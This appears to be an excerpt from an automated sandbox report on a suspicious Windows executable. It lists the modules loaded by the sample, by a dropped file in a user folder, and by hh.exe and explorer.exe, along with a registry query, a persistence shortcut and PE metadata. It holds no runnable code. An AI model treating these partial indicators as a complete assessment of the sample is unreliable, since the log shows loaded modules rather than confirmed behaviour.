Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: wldp.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: profapi.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: rasman.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: secur32.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: schannel.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: propsys.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: edputil.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: netutils.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: slc.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: userenv.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: sppc.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: apphelp.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: libcef.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: msvcp140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: vcruntime140_1.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: kernel.appcore.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: libcef.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: msvcp140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: msvcp140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: vcruntime140_1.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: kernel.appcore.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: taskschd.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: sspicli.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: xmllite.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: wininet.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: mscoree.dll
Source: C:\Windows\hh.exe, Section loaded: wininet.dll
Source: C:\Windows\hh.exe, Section loaded: mscoree.dll
Source: C:\Windows\hh.exe, Section loaded: winmm.dll
Source: C:\Windows\hh.exe, Section loaded: dxgi.dll
Source: C:\Windows\hh.exe, Section loaded: dinput8.dll
Source: C:\Windows\hh.exe, Section loaded: inputhost.dll
Source: C:\Windows\hh.exe, Section loaded: coremessaging.dll
Source: C:\Windows\hh.exe, Section loaded: propsys.dll
Source: C:\Windows\hh.exe, Section loaded: wintypes.dll
Source: C:\Windows\hh.exe, Section loaded: coreuicomponents.dll
Source: C:\Windows\hh.exe, Section loaded: ntmarta.dll
Source: C:\Windows\hh.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\hh.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\hh.exe, Section loaded: mswsock.dll
Source: C:\Windows\hh.exe, Section loaded: napinsp.dll
Source: C:\Windows\hh.exe, Section loaded: pnrpnsp.dll
Source: C:\Windows\hh.exe, Section loaded: wshbth.dll
Source: C:\Windows\hh.exe, Section loaded: nlaapi.dll
Source: C:\Windows\hh.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\hh.exe, Section loaded: dnsapi.dll
Source: C:\Windows\hh.exe, Section loaded: winrnr.dll
Source: C:\Windows\hh.exe, Section loaded: fwpuclnt.dll
Source: C:\Windows\hh.exe, Section loaded: rasadhlp.dll
Source: C:\Windows\hh.exe, Section loaded: resourcepolicyclient.dll
Source: C:\Windows\hh.exe, Section loaded: uxtheme.dll
Source: C:\Windows\hh.exe, Section loaded: devenum.dll
Source: C:\Windows\hh.exe, Section loaded: devobj.dll
Source: C:\Windows\hh.exe, Section loaded: msasn1.dll
Source: C:\Windows\hh.exe, Section loaded: msdmo.dll
Source: C:\Windows\hh.exe, Section loaded: windows.storage.dll
Source: C:\Windows\hh.exe, Section loaded: wldp.dll
Source: C:\Windows\hh.exe, Section loaded: profapi.dll
Source: C:\Windows\hh.exe, Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe, Section loaded: mscoree.dll
Source: C:\Windows\explorer.exe, Section loaded: aepic.dll
Source: C:\Windows\explorer.exe, Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe, Section loaded: userenv.dll
Source: C:\Windows\explorer.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe, Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe, Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe, Section loaded: propsys.dll
Source: C:\Windows\explorer.exe, Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe, Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe, Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe, Section loaded: wininet.dll
Source: C:\Windows\explorer.exe, Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe, Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe, Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe, Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe, Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe, Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe, Section loaded: wldp.dll
Source: C:\Windows\explorer.exe, Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe, Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe, Section loaded: netutils.dll
Source: C:\Windows\explorer.exe, Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe, Section loaded: ninput.dll
Source: C:\Windows\explorer.exe, Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe, Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe, Section loaded: slc.dll
Source: C:\Windows\explorer.exe, Section loaded: sppc.dll
Source: C:\Windows\explorer.exe, Section loaded: profapi.dll
Source: C:\Windows\explorer.exe, Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe, Section loaded: starttiledata.dll
Source: C:\Windows\explorer.exe, Section loaded: idstore.dll
Source: C:\Windows\explorer.exe, Section loaded: wlidprov.dll
Source: C:\Windows\explorer.exe, Section loaded: samcli.dll
Source: C:\Windows\explorer.exe, Section loaded: usermgrcli.dll
Source: C:\Windows\explorer.exe, Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe, Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe, Section loaded: usermgrproxy.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.applicationmodel.dll
Source: C:\Windows\explorer.exe, Section loaded: appxdeploymentclient.dll
Source: C:\Windows\explorer.exe, Section loaded: winsta.dll
Source: C:\Windows\explorer.exe, Section loaded: sndvolsso.dll
Source: C:\Windows\explorer.exe, Section loaded: mmdevapi.dll
Source: C:\Windows\explorer.exe, Section loaded: devobj.dll
Source: C:\Windows\explorer.exe, Section loaded: oleacc.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.staterepositoryclient.dll
Source: C:\Windows\explorer.exe, Section loaded: textshaping.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.ui.dll
Source: C:\Windows\explorer.exe, Section loaded: windowmanagementapi.dll
Source: C:\Windows\explorer.exe, Section loaded: textinputframework.dll
Source: C:\Windows\explorer.exe, Section loaded: inputhost.dll
Source: C:\Windows\explorer.exe, Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe, Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe, Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe, Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe, Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.cloudstore.dll
Source: C:\Windows\explorer.exe, Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe, Section loaded: d3d11.dll
Source: C:\Windows\explorer.exe, Section loaded: appextension.dll
Source: C:\Windows\explorer.exe, Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe, Section loaded: d3d10warp.dll
Source: C:\Windows\explorer.exe, Section loaded: dxcore.dll
Source: C:\Windows\explorer.exe, Section loaded: d2d1.dll
Source: C:\Windows\explorer.exe, Section loaded: dwrite.dll
Source: C:\Windows\explorer.exe, Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe, Section loaded: cldapi.dll
Source: C:\Windows\explorer.exe, Section loaded: fltlib.dll
Source: C:\Windows\explorer.exe, Section loaded: dataexchange.dll
Source: C:\Windows\explorer.exe, Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe, Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe, Section loaded: tiledatarepository.dll
Source: C:\Windows\explorer.exe, Section loaded: staterepository.core.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.staterepository.dll
Source: C:\Windows\explorer.exe, Section loaded: twinui.pcshell.dll
Source: C:\Windows\explorer.exe, Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe, Section loaded: wincorlib.dll
Source: C:\Windows\explorer.exe, Section loaded: cdp.dll
Source: C:\Windows\explorer.exe, Section loaded: dsreg.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.immersiveshell.serviceprovider.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\explorer.exe, Section loaded: mrmcorer.dll
Source: C:\Windows\explorer.exe, Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe, Section loaded: languageoverlayutil.dll
Source: C:\Windows\explorer.exe, Section loaded: bcp47mrm.dll
Source: C:\Windows\explorer.exe, Section loaded: thumbcache.dll
Source: C:\Windows\explorer.exe, Section loaded: edputil.dll
Source: C:\Windows\explorer.exe, Section loaded: photometadatahandler.dll
Source: C:\Windows\explorer.exe, Section loaded: ntshrui.dll
Source: C:\Windows\explorer.exe, Section loaded: cscapi.dll
Source: C:\Windows\explorer.exe, Section loaded: linkinfo.dll
Source: C:\Windows\explorer.exe, Section loaded: ehstorshell.dll
Source: C:\Windows\explorer.exe, Section loaded: cscui.dll
Source: C:\Windows\explorer.exe, Section loaded: provsvc.dll
Source: C:\Windows\explorer.exe, Section loaded: twinui.appcore.dll
Source: C:\Windows\explorer.exe, Section loaded: twinui.dll
Source: C:\Windows\explorer.exe, Section loaded: pdh.dll
Source: C:\Windows\explorer.exe, Section loaded: applicationframe.dll
Source: C:\Windows\explorer.exe, Section loaded: rmclient.dll
Source: C:\Windows\explorer.exe, Section loaded: holographicextensions.dll
Source: C:\Windows\explorer.exe, Section loaded: virtualmonitormanager.dll
Source: C:\Windows\explorer.exe, Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.ui.immersive.dll
Source: C:\Windows\explorer.exe, Section loaded: abovelockapphost.dll
Source: C:\Windows\explorer.exe, Section loaded: npsm.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.web.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.shell.bluelightreduction.dll
Source: C:\Windows\explorer.exe, Section loaded: mscms.dll
Source: C:\Windows\explorer.exe, Section loaded: coloradapterclient.dll
Source: C:\Windows\explorer.exe, Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.internal.signals.dll
Source: C:\Windows\explorer.exe, Section loaded: tdh.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.staterepositorybroker.dll
Source: C:\Windows\explorer.exe, Section loaded: mfplat.dll
Source: C:\Windows\explorer.exe, Section loaded: rtworkq.dll
Source: C:\Windows\explorer.exe, Section loaded: taskflowdataengine.dll
Source: C:\Windows\explorer.exe, Section loaded: structuredquery.dll
Source: C:\Windows\explorer.exe, Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.security.authentication.web.core.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.data.activities.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.system.launcher.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.internal.ui.shell.windowtabmanager.dll
Source: C:\Windows\explorer.exe, Section loaded: notificationcontrollerps.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.globalization.dll
Source: C:\Windows\explorer.exe, Section loaded: icu.dll
Source: C:\Windows\explorer.exe, Section loaded: mswb7.dll
Source: C:\Windows\explorer.exe, Section loaded: devdispitemprovider.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.ui.core.textinput.dll
Source: C:\Windows\explorer.exe, Section loaded: windowsudk.shellcommon.dll
Source: C:\Windows\explorer.exe, Section loaded: dictationmanager.dll
Source: C:\Windows\explorer.exe, Section loaded: uianimation.dll
Source: C:\Windows\explorer.exe, Section loaded: npmproxy.dll
Source: C:\Windows\explorer.exe, Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe, Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe, Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe, Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe, Section loaded: dpapi.dll
Source: C:\Windows\explorer.exe, Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe, Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe, Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe, Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe, Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe, Section loaded: schannel.dll
Source: C:\Windows\explorer.exe, Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe, Section loaded: stobject.dll
Source: C:\Windows\explorer.exe, Section loaded: wmiclnt.dll
Source: C:\Windows\explorer.exe, Section loaded: workfoldersshell.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\explorer.exe, Section loaded: mskeyprotect.dll
Source: C:\Windows\explorer.exe, Section loaded: ntasn1.dll
Source: C:\Windows\explorer.exe, Section loaded: ncrypt.dll
Source: C:\Windows\explorer.exe, Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe, Section loaded: gpapi.dll
Source: C:\Windows\explorer.exe, Section loaded: pcshellcommonproxystub.dll
Source: C:\Windows\explorer.exe, Section loaded: execmodelproxy.dll
Source: C:\Windows\explorer.exe, Section loaded: daxexec.dll
Source: C:\Windows\explorer.exe, Section loaded: container.dll
Source: C:\Windows\explorer.exe, Section loaded: shellcommoncommonproxystub.dll
Source: C:\Windows\explorer.exe, Section loaded: cryptngc.dll
Source: C:\Windows\explorer.exe, Section loaded: cflapi.dll
Source: C:\Windows\explorer.exe, Section loaded: samlib.dll
Source: C:\Windows\explorer.exe, Section loaded: uiautomationcore.dll
Source: C:\Windows\explorer.exe, Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\explorer.exe, Section loaded: batmeter.dll
Source: C:\Windows\explorer.exe, Section loaded: sxs.dll
Source: C:\Windows\explorer.exe, Section loaded: inputswitch.dll
Source: C:\Windows\explorer.exe, Section loaded: prnfldr.dll
Source: C:\Windows\explorer.exe, Section loaded: es.dll
Source: C:\Windows\explorer.exe, Section loaded: windows.ui.shell.dll
Source: C:\Windows\explorer.exe, Section loaded: dxp.dll
Source: C:\Windows\explorer.exe, Section loaded: shdocvw.dll
Source: C:\Windows\explorer.exe, Section loaded: atlthunk.dll
Source: C:\Windows\explorer.exe, Section loaded: actioncenter.dll
Source: C:\Windows\explorer.exe, Section loaded: wevtapi.dll
Source: C:\Windows\explorer.exe, Section loaded: syncreg.dll
Source: C:\Windows\explorer.exe, Section loaded: audioses.dll
Source: C:\Windows\explorer.exe, Section loaded: pnidui.dll
Source: C:\Windows\explorer.exe, Section loaded: mobilenetworking.dll
Source: C:\Windows\explorer.exe, Section loaded: netprofm.dll
Source: C:\Windows\explorer.exe, Section loaded: wscinterop.dll
Source: C:\Windows\explorer.exe, Section loaded: wscapi.dll
Source: C:\Windows\explorer.exe, Section loaded: networkuxbroker.dll
Source: C:\Windows\explorer.exe, Section loaded: wpnclient.dll
Source: C:\Windows\explorer.exeSection loaded: ethernetmediamanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: werconcpl.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wer.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: hcproviders.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dusmapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wlanapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: storageusage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: fhcfg.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: efsutil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.internal.system.userprofile.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cloudexperiencehostbroker.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: credui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wdscore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wpdshserviceobj.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: portabledevicetypes.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: portabledeviceapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cscobj.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: srchadmin.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: synccenter.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: imapi2.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ncsi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ieproxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: settingsync.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: settingsynccore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wpnapps.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.xaml.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windowsinternal.composableshell.desktophosting.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uiamanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: libcef.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: msvcp140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: vcruntime140_1.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Section loaded: kernel.appcore.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: down.lnk.11.dr, LNK file: ..\..\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
Source: Window Recorder, Window detected: More than 3 window changes detected
Source: VJQyKuHEUe.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: VJQyKuHEUe.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: VJQyKuHEUe.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\buildworker\csgo_rel_win64\build\_build_\valve_wmf\_vpc_valve_wmf\default\win64\_msvc_\Retail\valve_wmf.pdb source: VJQyKuHEUe.exe
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: zfon.exe, 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000006.00000002.2626243469.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001A.00000002.2826630254.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001B.00000002.2826626774.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001C.00000002.2983575039.00007FF8BFB75000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001D.00000002.2983573004.00007FF8BFB75000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001E.00000002.3573610429.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001F.00000002.3573612962.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000022.00000002.4202113973.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000023.00000002.4200959181.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, vcruntime140_1.dll.0.dr
Source: Binary string: C:\projects\hydra\main\Release_X64\sceneProd\sceneSourceCef.pdb source: zfon.exe, zfon.exe, 00000006.00000002.2606835994.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000000.2806503804.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000002.2809299266.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000000.2959614142.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
